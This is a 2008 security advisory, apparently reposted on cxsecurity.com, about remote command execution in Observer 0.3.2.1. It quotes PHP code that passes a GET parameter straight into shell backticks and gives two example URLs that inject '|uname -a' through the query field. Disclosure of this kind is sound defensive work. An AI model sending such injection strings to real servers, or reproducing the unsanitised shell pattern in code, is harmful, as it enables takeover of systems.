Bug: Observer 0.3.2.1 Multiple Remote Command Execution Vulnerabilities ( Ascii Version )

Search:
WLB2

Observer 0.3.2.1 Multiple Remote Command Execution Vulnerabilities

Published
Credit
Risk
2008.10.01
dun
High
CWE
CVE
Local
Remote
CWE-20
CVE-2008-4318
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
10/10
10/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Complete
Complete
Complete

:::::::-. ... ::::::. :::.
;;, `';, ;; ;;;`;;;;, `;;;
`[[ [[[[' [[[ [[[[[. '[[
$$, $$$$ $$$ $$$ "Y$c$$
888_,o8P'88 .d888 888 Y88
MMMMP"` "YmmMMMM"" MMM YM

[ Discovered by dun \ dun[at]strcpy.pl ]

#########################################################
# [ observer <= 0.3.2.1 ] Remote Command Execution #
#########################################################
#
# Script: "Observer is an autodiscovering PHP/MySQL/SNMP/CDP based network management system focused primarily on
Cisco and Linux/BSD networks."
#
# Script site: http://www.project-observer.org/
# Download: http://freshmeat.net/projects/observer/
#
# Vuln:
# (1) http://site.com/[observer-0.3.2.1]/whois.php?query=|uname -a
# (2) http://site.com/[observer-0.3.2.1]/netcmd.php?cmd=nmap&query=|uname -a
#
#
# Bug(1): ./observer-0.3.2.1/html/whois.php
#
# ...
# $output = `/usr/bin/whois $_GET[query] | grep -v \%`;
# $output = trim($output);
# echo("<pre>$output</pre>");
# ...
#
#
# Bug(2): ./observer-0.3.2.1/html/netcmd.php
#
# ...
# switch ($_GET[cmd]) {
# case 'whois':
# $output = `/usr/bin/whois $_GET[query] | grep -v \%`;
# break;
# case 'ping':
# $output = `/bin/ping $_GET[query]`;
# break;
# case 'tracert':
# $output = `/usr/sbin/traceroute $_GET[query]`;
# break;
# case 'nmap':
# $output = `/usr/bin/nmap $_GET[query]`;
# break;
# }
# $output = trim($output);
# echo("<pre>$output</pre>");
# ...
#
#
###############################################
# Greetz: D3m0n_DE * str0ke * and otherz..
###############################################

[ dun / 2008 ]

*******************************************************************************************

References:

http://xforce.iss.net/xforce/xfdb/45398

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version